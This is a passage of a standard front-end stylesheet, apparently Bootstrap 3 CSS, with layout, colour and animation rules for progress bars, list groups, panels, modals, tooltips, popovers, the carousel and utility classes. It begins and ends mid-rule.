transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); -webkit-background-size: 40px 40px; background-size: 40px 40px; } .progress.active .progress-bar, .progress-bar.active { -webkit-animation: progress-bar-stripes 2s linear infinite; -o-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } .progress-bar-success { background-color: #5cb85c; } .progress-striped .progress-bar-success { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-info { background-color: #5bc0de; } .progress-striped .progress-bar-info { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-warning { background-color: #f0ad4e; } .progress-striped .progress-bar-warning { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .progress-bar-danger { background-color: #d9534f; } .progress-striped .progress-bar-danger { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); } .media { margin-top: 15px; } .media:first-child { margin-top: 0; } .media, .media-body { overflow: hidden; zoom: 1; } .media-body { width: 10000px; } .media-object { display: block; } .media-right, .media > .pull-right { padding-left: 10px; } .media-left, .media > .pull-left { padding-right: 10px; } .media-left, .media-right, .media-body { display: table-cell; vertical-align: top; } .media-middle { vertical-align: middle; } .media-bottom { vertical-align: bottom; } .media-heading { margin-top: 0; margin-bottom: 5px; } .media-list { padding-left: 0; list-style: none; } .list-group { padding-left: 0; margin-bottom: 20px; } .list-group-item { position: relative; display: block; padding: 10px 15px; margin-bottom: -1px; background-color: #fff; border: 1px solid #ddd; } .list-group-item:first-child { border-top-left-radius: 4px; border-top-right-radius: 4px; } .list-group-item:last-child { margin-bottom: 0; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; } a.list-group-item { color: #555; } a.list-group-item .list-group-item-heading { color: #333; } a.list-group-item:hover, a.list-group-item:focus { color: #555; text-decoration: none; background-color: #f5f5f5; } .list-group-item.disabled, .list-group-item.disabled:hover, .list-group-item.disabled:focus { color: #777; cursor: not-allowed; background-color: #eee; } .list-group-item.disabled .list-group-item-heading, .list-group-item.disabled:hover .list-group-item-heading, .list-group-item.disabled:focus .list-group-item-heading { color: inherit; } .list-group-item.disabled .list-group-item-text, .list-group-item.disabled:hover .list-group-item-text, .list-group-item.disabled:focus .list-group-item-text { color: #777; } .list-group-item.active, .list-group-item.active:hover, .list-group-item.active:focus { z-index: 2; color: #fff; background-color: #337ab7; border-color: #337ab7; } .list-group-item.active .list-group-item-heading, .list-group-item.active:hover .list-group-item-heading, .list-group-item.active:focus .list-group-item-heading, .list-group-item.active .list-group-item-heading > small, .list-group-item.active:hover .list-group-item-heading > small, .list-group-item.active:focus .list-group-item-heading > small, .list-group-item.active .list-group-item-heading > .small, .list-group-item.active:hover .list-group-item-heading > .small, .list-group-item.active:focus .list-group-item-heading > .small { color: inherit; } .list-group-item.active .list-group-item-text, .list-group-item.active:hover .list-group-item-text, .list-group-item.active:focus .list-group-item-text { color: #c7ddef; } .list-group-item-success { color: #3c763d; background-color: #dff0d8; } a.list-group-item-success { color: #3c763d; } a.list-group-item-success .list-group-item-heading { color: inherit; } a.list-group-item-success:hover, a.list-group-item-success:focus { color: #3c763d; background-color: #d0e9c6; } a.list-group-item-success.active, a.list-group-item-success.active:hover, a.list-group-item-success.active:focus { color: #fff; background-color: #3c763d; border-color: #3c763d; } .list-group-item-info { color: #31708f; background-color: #d9edf7; } a.list-group-item-info { color: #31708f; } a.list-group-item-info .list-group-item-heading { color: inherit; } a.list-group-item-info:hover, a.list-group-item-info:focus { color: #31708f; background-color: #c4e3f3; } a.list-group-item-info.active, a.list-group-item-info.active:hover, a.list-group-item-info.active:focus { color: #fff; background-color: #31708f; border-color: #31708f; } .list-group-item-warning { color: #8a6d3b; background-color: #fcf8e3; } a.list-group-item-warning { color: #8a6d3b; } a.list-group-item-warning .list-group-item-heading { color: inherit; } a.list-group-item-warning:hover, a.list-group-item-warning:focus { color: #8a6d3b; background-color: #faf2cc; } a.list-group-item-warning.active, a.list-group-item-warning.active:hover, a.list-group-item-warning.active:focus { color: #fff; background-color: #8a6d3b; border-color: #8a6d3b; } .list-group-item-danger { color: #a94442; background-color: #f2dede; } a.list-group-item-danger { color: #a94442; } a.list-group-item-danger .list-group-item-heading { color: inherit; } a.list-group-item-danger:hover, a.list-group-item-danger:focus { color: #a94442; background-color: #ebcccc; } a.list-group-item-danger.active, a.list-group-item-danger.active:hover, a.list-group-item-danger.active:focus { color: #fff; background-color: #a94442; border-color: #a94442; } .list-group-item-heading { margin-top: 0; margin-bottom: 5px; } .list-group-item-text { margin-bottom: 0; line-height: 1.3; } .panel { margin-bottom: 20px; background-color: #fff; border: 1px solid transparent; border-radius: 4px; -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .05); box-shadow: 0 1px 1px rgba(0, 0, 0, .05); } .panel-body { padding: 15px; } .panel-heading { padding: 10px 15px; border-bottom: 1px solid transparent; border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel-heading > .dropdown .dropdown-toggle { color: inherit; } .panel-title { margin-top: 0; margin-bottom: 0; font-size: 16px; color: inherit; } .panel-title > a, .panel-title > small, .panel-title > .small, .panel-title > small > a, .panel-title > .small > a { color: inherit; } .panel-footer { padding: 10px 15px; background-color: #f5f5f5; border-top: 1px solid #ddd; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel > .list-group, .panel > .panel-collapse > .list-group { margin-bottom: 0; } .panel > .list-group .list-group-item, .panel > .panel-collapse > .list-group .list-group-item { border-width: 1px 0; border-radius: 0; } .panel > .list-group:first-child .list-group-item:first-child, .panel > .panel-collapse > .list-group:first-child .list-group-item:first-child { border-top: 0; border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel > .list-group:last-child .list-group-item:last-child, .panel > .panel-collapse > .list-group:last-child .list-group-item:last-child { border-bottom: 0; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel-heading + .list-group .list-group-item:first-child { border-top-width: 0; } .list-group + .panel-footer { border-top-width: 0; } .panel > .table, .panel > .table-responsive > .table, .panel > .panel-collapse > .table { margin-bottom: 0; } .panel > .table caption, .panel > .table-responsive > .table caption, .panel > .panel-collapse > .table caption { padding-right: 15px; padding-left: 15px; } .panel > .table:first-child, .panel > .table-responsive:first-child > .table:first-child { border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child { border-top-left-radius: 3px; border-top-right-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child { border-top-left-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child { border-top-right-radius: 3px; } .panel > .table:last-child, .panel > .table-responsive:last-child > .table:last-child { border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child { border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child { border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child { border-bottom-right-radius: 3px; } .panel > .panel-body + .table, .panel > .panel-body + .table-responsive, .panel > .table + .panel-body, .panel > .table-responsive + .panel-body { border-top: 1px solid #ddd; } .panel > .table > tbody:first-child > tr:first-child th, .panel > .table > tbody:first-child > tr:first-child td { border-top: 0; } .panel > .table-bordered, .panel > .table-responsive > .table-bordered { border: 0; } .panel > .table-bordered > thead > tr > th:first-child, .panel > .table-responsive > .table-bordered > thead > tr > th:first-child, .panel > .table-bordered > tbody > tr > th:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:first-child, .panel > .table-bordered > tfoot > tr > th:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child, .panel > .table-bordered > thead > tr > td:first-child, .panel > .table-responsive > .table-bordered > thead > tr > td:first-child, .panel > .table-bordered > tbody > tr > td:first-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:first-child, .panel > .table-bordered > tfoot > tr > td:first-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .panel > .table-bordered > thead > tr > th:last-child, .panel > .table-responsive > .table-bordered > thead > tr > th:last-child, .panel > .table-bordered > tbody > tr > th:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > th:last-child, .panel > .table-bordered > tfoot > tr > th:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child, .panel > .table-bordered > thead > tr > td:last-child, .panel > .table-responsive > .table-bordered > thead > tr > td:last-child, .panel > .table-bordered > tbody > tr > td:last-child, .panel > .table-responsive > .table-bordered > tbody > tr > td:last-child, .panel > .table-bordered > tfoot > tr > td:last-child, .panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .panel > .table-bordered > thead > tr:first-child > td, .panel > .table-responsive > .table-bordered > thead > tr:first-child > td, .panel > .table-bordered > tbody > tr:first-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > td, .panel > .table-bordered > thead > tr:first-child > th, .panel > .table-responsive > .table-bordered > thead > tr:first-child > th, .panel > .table-bordered > tbody > tr:first-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:first-child > th { border-bottom: 0; } .panel > .table-bordered > tbody > tr:last-child > td, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > td, .panel > .table-bordered > tfoot > tr:last-child > td, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td, .panel > .table-bordered > tbody > tr:last-child > th, .panel > .table-responsive > .table-bordered > tbody > tr:last-child > th, .panel > .table-bordered > tfoot > tr:last-child > th, .panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th { border-bottom: 0; } .panel > .table-responsive { margin-bottom: 0; border: 0; } .panel-group { margin-bottom: 20px; } .panel-group .panel { margin-bottom: 0; border-radius: 4px; } .panel-group .panel + .panel { margin-top: 5px; } .panel-group .panel-heading { border-bottom: 0; } .panel-group .panel-heading + .panel-collapse > .panel-body, .panel-group .panel-heading + .panel-collapse > .list-group { border-top: 1px solid #ddd; } .panel-group .panel-footer { border-top: 0; } .panel-group .panel-footer + .panel-collapse .panel-body { border-bottom: 1px solid #ddd; } .panel-default { border-color: #ddd; } .panel-default > .panel-heading { color: #333; background-color: #f5f5f5; border-color: #ddd; } .panel-default > .panel-heading + .panel-collapse > .panel-body { border-top-color: #ddd; } .panel-default > .panel-heading .badge { color: #f5f5f5; background-color: #333; } .panel-default > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #ddd; } .panel-primary { border-color: #337ab7; } .panel-primary > .panel-heading { color: #fff; background-color: #337ab7; border-color: #337ab7; } .panel-primary > .panel-heading + .panel-collapse > .panel-body { border-top-color: #337ab7; } .panel-primary > .panel-heading .badge { color: #337ab7; background-color: #fff; } .panel-primary > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #337ab7; } .panel-success { border-color: #d6e9c6; } .panel-success > .panel-heading { color: #3c763d; background-color: #dff0d8; border-color: #d6e9c6; } .panel-success > .panel-heading + .panel-collapse > .panel-body { border-top-color: #d6e9c6; } .panel-success > .panel-heading .badge { color: #dff0d8; background-color: #3c763d; } .panel-success > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #d6e9c6; } .panel-info { border-color: #bce8f1; } .panel-info > .panel-heading { color: #31708f; background-color: #d9edf7; border-color: #bce8f1; } .panel-info > .panel-heading + .panel-collapse > .panel-body { border-top-color: #bce8f1; } .panel-info > .panel-heading .badge { color: #d9edf7; background-color: #31708f; } .panel-info > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #bce8f1; } .panel-warning { border-color: #faebcc; } .panel-warning > .panel-heading { color: #8a6d3b; background-color: #fcf8e3; border-color: #faebcc; } .panel-warning > .panel-heading + .panel-collapse > .panel-body { border-top-color: #faebcc; } .panel-warning > .panel-heading .badge { color: #fcf8e3; background-color: #8a6d3b; } .panel-warning > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #faebcc; } .panel-danger { border-color: #ebccd1; } .panel-danger > .panel-heading { color: #a94442; background-color: #f2dede; border-color: #ebccd1; } .panel-danger > .panel-heading + .panel-collapse > .panel-body { border-top-color: #ebccd1; } .panel-danger > .panel-heading .badge { color: #f2dede; background-color: #a94442; } .panel-danger > .panel-footer + .panel-collapse > .panel-body { border-bottom-color: #ebccd1; } .embed-responsive { position: relative; display: block; height: 0; padding: 0; overflow: hidden; } .embed-responsive .embed-responsive-item, .embed-responsive iframe, .embed-responsive embed, .embed-responsive object, .embed-responsive video { position: absolute; top: 0; bottom: 0; left: 0; width: 100%; height: 100%; border: 0; } .embed-responsive-16by9 { padding-bottom: 56.25%; } .embed-responsive-4by3 { padding-bottom: 75%; } .well { min-height: 20px; padding: 19px; margin-bottom: 20px; background-color: #f5f5f5; border: 1px solid #e3e3e3; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05); } .well blockquote { border-color: #ddd; border-color: rgba(0, 0, 0, .15); } .well-lg { padding: 24px; border-radius: 6px; } .well-sm { padding: 9px; border-radius: 3px; } .close { float: right; font-size: 21px; font-weight: bold; line-height: 1; color: #000; text-shadow: 0 1px 0 #fff; filter: alpha(opacity=20); opacity: .2; } .close:hover, .close:focus { color: #000; text-decoration: none; cursor: pointer; filter: alpha(opacity=50); opacity: .5; } button.close { -webkit-appearance: none; padding: 0; cursor: pointer; background: transparent; border: 0; } .modal-open { overflow: hidden; } .modal { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1050; display: none; overflow: hidden; -webkit-overflow-scrolling: touch; outline: 0; } .modal.fade .modal-dialog { -webkit-transition: -webkit-transform .3s ease-out; -o-transition: -o-transform .3s ease-out; transition: transform .3s ease-out; -webkit-transform: translate(0, -25%); -ms-transform: translate(0, -25%); -o-transform: translate(0, -25%); transform: translate(0, -25%); } .modal.in .modal-dialog { -webkit-transform: translate(0, 0); -ms-transform: translate(0, 0); -o-transform: translate(0, 0); transform: translate(0, 0); } .modal-open .modal { overflow-x: hidden; overflow-y: auto; } .modal-dialog { position: relative; width: auto; margin: 10px; } .modal-content { position: relative; background-color: #fff; -webkit-background-clip: padding-box; background-clip: padding-box; border: 1px solid #999; border: 1px solid rgba(0, 0, 0, .2); border-radius: 6px; outline: 0; -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, .5); box-shadow: 0 3px 9px rgba(0, 0, 0, .5); } .modal-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 1040; background-color: #000; } .modal-backdrop.fade { filter: alpha(opacity=0); opacity: 0; } .modal-backdrop.in { filter: alpha(opacity=50); opacity: .5; } .modal-header { min-height: 16.42857143px; padding: 15px; border-bottom: 1px solid #e5e5e5; } .modal-header .close { margin-top: -2px; } .modal-title { margin: 0; line-height: 1.42857143; } .modal-body { position: relative; padding: 15px; } .modal-footer { padding: 15px; text-align: right; border-top: 1px solid #e5e5e5; } .modal-footer .btn + .btn { margin-bottom: 0; margin-left: 5px; } .modal-footer .btn-group .btn + .btn { margin-left: -1px; } .modal-footer .btn-block + .btn-block { margin-left: 0; } .modal-scrollbar-measure { position: absolute; top: -9999px; width: 50px; height: 50px; overflow: scroll; } @media (min-width: 768px) { .modal-dialog { width: 600px; margin: 30px auto; } .modal-content { -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, .5); box-shadow: 0 5px 15px rgba(0, 0, 0, .5); } .modal-sm { width: 300px; } } @media (min-width: 992px) { .modal-lg { width: 900px; } } .tooltip { position: absolute; z-index: 1070; display: block; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; font-weight: normal; line-height: 1.4; filter: alpha(opacity=0); opacity: 0; } .tooltip.in { filter: alpha(opacity=90); opacity: .9; } .tooltip.top { padding: 5px 0; margin-top: -3px; } .tooltip.right { padding: 0 5px; margin-left: 3px; } .tooltip.bottom { padding: 5px 0; margin-top: 3px; } .tooltip.left { padding: 0 5px; margin-left: -3px; } .tooltip-inner { max-width: 200px; padding: 3px 8px; color: #fff; text-align: center; text-decoration: none; background-color: #000; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-left .tooltip-arrow { right: 5px; bottom: 0; margin-bottom: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-right .tooltip-arrow { bottom: 0; left: 5px; margin-bottom: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-left .tooltip-arrow { top: 0; right: 5px; margin-top: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-right .tooltip-arrow { top: 0; left: 5px; margin-top: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .popover { position: absolute; top: 0; left: 0; z-index: 1060; display: none; max-width: 276px; padding: 1px; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: normal; line-height: 1.42857143; text-align: left; white-space: normal; background-color: #fff; -webkit-background-clip: padding-box; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, .2); border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, .2); box-shadow: 0 5px 10px rgba(0, 0, 0, .2); } .popover.top { margin-top: -10px; } .popover.right { margin-left: 10px; } .popover.bottom { margin-top: 10px; } .popover.left { margin-left: -10px; } .popover-title { padding: 8px 14px; margin: 0; font-size: 14px; background-color: #f7f7f7; border-bottom: 1px solid #ebebeb; border-radius: 5px 5px 0 0; } .popover-content { padding: 9px 14px; } .popover > .arrow, .popover > .arrow:after { position: absolute; display: block; width: 0; height: 0; border-color: transparent; border-style: solid; } .popover > .arrow { border-width: 11px; } .popover > .arrow:after { content: ""; border-width: 10px; } .popover.top > .arrow { bottom: -11px; left: 50%; margin-left: -11px; border-top-color: #999; border-top-color: rgba(0, 0, 0, .25); border-bottom-width: 0; } .popover.top > .arrow:after { bottom: 1px; margin-left: -10px; content: " "; border-top-color: #fff; border-bottom-width: 0; } .popover.right > .arrow { top: 50%; left: -11px; margin-top: -11px; border-right-color: #999; border-right-color: rgba(0, 0, 0, .25); border-left-width: 0; } .popover.right > .arrow:after { bottom: -10px; left: 1px; content: " "; border-right-color: #fff; border-left-width: 0; } .popover.bottom > .arrow { top: -11px; left: 50%; margin-left: -11px; border-top-width: 0; border-bottom-color: #999; border-bottom-color: rgba(0, 0, 0, .25); } .popover.bottom > .arrow:after { top: 1px; margin-left: -10px; content: " "; border-top-width: 0; border-bottom-color: #fff; } .popover.left > .arrow { top: 50%; right: -11px; margin-top: -11px; border-right-width: 0; border-left-color: #999; border-left-color: rgba(0, 0, 0, .25); } .popover.left > .arrow:after { right: 1px; bottom: -10px; content: " "; border-right-width: 0; border-left-color: #fff; } .carousel { position: relative; } .carousel-inner { position: relative; width: 100%; overflow: hidden; } .carousel-inner > .item { position: relative; display: none; -webkit-transition: .6s ease-in-out left; -o-transition: .6s ease-in-out left; transition: .6s ease-in-out left; } .carousel-inner > .item > img, .carousel-inner > .item > a > img { line-height: 1; } @media all and (transform-3d), (-webkit-transform-3d) { .carousel-inner > .item { -webkit-transition: -webkit-transform .6s ease-in-out; -o-transition: -o-transform .6s ease-in-out; transition: transform .6s ease-in-out; -webkit-backface-visibility: hidden; backface-visibility: hidden; -webkit-perspective: 1000; perspective: 1000; } .carousel-inner > .item.next, .carousel-inner > .item.active.right { left: 0; -webkit-transform: translate3d(100%, 0, 0); transform: translate3d(100%, 0, 0); } .carousel-inner > .item.prev, .carousel-inner > .item.active.left { left: 0; -webkit-transform: translate3d(-100%, 0, 0); transform: translate3d(-100%, 0, 0); } .carousel-inner > .item.next.left, .carousel-inner > .item.prev.right, .carousel-inner > .item.active { left: 0; -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); } } .carousel-inner > .active, .carousel-inner > .next, .carousel-inner > .prev { display: block; } .carousel-inner > .active { left: 0; } .carousel-inner > .next, .carousel-inner > .prev { position: absolute; top: 0; width: 100%; } .carousel-inner > .next { left: 100%; } .carousel-inner > .prev { left: -100%; } .carousel-inner > .next.left, .carousel-inner > .prev.right { left: 0; } .carousel-inner > .active.left { left: -100%; } .carousel-inner > .active.right { left: 100%; } .carousel-control { position: absolute; top: 0; bottom: 0; left: 0; width: 15%; font-size: 20px; color: #fff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, .6); filter: alpha(opacity=50); opacity: .5; } .carousel-control.left { background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, .5) 0%, rgba(0, 0, 0, .0001) 100%); background-image: -o-linear-gradient(left, rgba(0, 0, 0, .5) 0%, rgba(0, 0, 0, .0001) 100%); background-image: -webkit-gradient(linear, left top, right top, from(rgba(0, 0, 0, .5)), to(rgba(0, 0, 0, .0001))); background-image: linear-gradient(to right, rgba(0, 0, 0, .5) 0%, rgba(0, 0, 0, .0001) 100%); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1); background-repeat: repeat-x; } .carousel-control.right { right: 0; left: auto; background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, .0001) 0%, rgba(0, 0, 0, .5) 100%); background-image: -o-linear-gradient(left, rgba(0, 0, 0, .0001) 0%, rgba(0, 0, 0, .5) 100%); background-image: -webkit-gradient(linear, left top, right top, from(rgba(0, 0, 0, .0001)), to(rgba(0, 0, 0, .5))); background-image: linear-gradient(to right, rgba(0, 0, 0, .0001) 0%, rgba(0, 0, 0, .5) 100%); filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1); background-repeat: repeat-x; } .carousel-control:hover, .carousel-control:focus { color: #fff; text-decoration: none; filter: alpha(opacity=90); outline: 0; opacity: .9; } .carousel-control .icon-prev, .carousel-control .icon-next, .carousel-control .glyphicon-chevron-left, .carousel-control .glyphicon-chevron-right { position: absolute; top: 50%; z-index: 5; display: inline-block; } .carousel-control .icon-prev, .carousel-control .glyphicon-chevron-left { left: 50%; margin-left: -10px; } .carousel-control .icon-next, .carousel-control .glyphicon-chevron-right { right: 50%; margin-right: -10px; } .carousel-control .icon-prev, .carousel-control .icon-next { width: 20px; height: 20px; margin-top: -10px; font-family: serif; line-height: 1; } .carousel-control .icon-prev:before { content: '\2039'; } .carousel-control .icon-next:before { content: '\203a'; } .carousel-indicators { position: absolute; bottom: 10px; left: 50%; z-index: 15; width: 60%; padding-left: 0; margin-left: -30%; text-align: center; list-style: none; } .carousel-indicators li { display: inline-block; width: 10px; height: 10px; margin: 1px; text-indent: -999px; cursor: pointer; background-color: #000 \9; background-color: rgba(0, 0, 0, 0); border: 1px solid #fff; border-radius: 10px; } .carousel-indicators .active { width: 12px; height: 12px; margin: 0; background-color: #fff; } .carousel-caption { position: absolute; right: 15%; bottom: 20px; left: 15%; z-index: 10; padding-top: 20px; padding-bottom: 20px; color: #fff; text-align: center; text-shadow: 0 1px 2px rgba(0, 0, 0, .6); } .carousel-caption .btn { text-shadow: none; } @media screen and (min-width: 768px) { .carousel-control .glyphicon-chevron-left, .carousel-control .glyphicon-chevron-right, .carousel-control .icon-prev, .carousel-control .icon-next { width: 30px; height: 30px; margin-top: -15px; font-size: 30px; } .carousel-control .glyphicon-chevron-left, .carousel-control .icon-prev { margin-left: -15px; } .carousel-control .glyphicon-chevron-right, .carousel-control .icon-next { margin-right: -15px; } .carousel-caption { right: 20%; left: 20%; padding-bottom: 30px; } .carousel-indicators { bottom: 20px; } } .clearfix:before, .clearfix:after, .dl-horizontal dd:before, .dl-horizontal dd:after, .container:before, .container:after, .container-fluid:before, .container-fluid:after, .row:before, .row:after, .form-horizontal .form-group:before, .form-horizontal .form-group:after, .btn-toolbar:before, .btn-toolbar:after, .btn-group-vertical > .btn-group:before, .btn-group-vertical > .btn-group:after, .nav:before, .nav:after, .navbar:before, .navbar:after, .navbar-header:before, .navbar-header:after, .navbar-collapse:before, .navbar-collapse:after, .pager:before, .pager:after, .panel-body:before, .panel-body:after, .modal-footer:before, .modal-footer:after { display: table; content: " "; } .clearfix:after, .dl-horizontal dd:after, .container:after, .container-fluid:after, .row:after, .form-horizontal .form-group:after, .btn-toolbar:after, .btn-group-vertical > .btn-group:after, .nav:after, .navbar:after, .navbar-header:after, .navbar-collapse:after, .pager:after, .panel-body:after, .modal-footer:after { clear: both; } .center-block { display: block; margin-right: auto; margin-left: auto; } .pull-right { float: right !important; } .pull-left { float: left !important; } .hide { display: none !important; } .show { display: block !important; } .invisible { visibility: hidden; } .text-hide { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .hidden { display: none !important; } .affix { position: fixed; } @-ms-viewport { width: device-width; 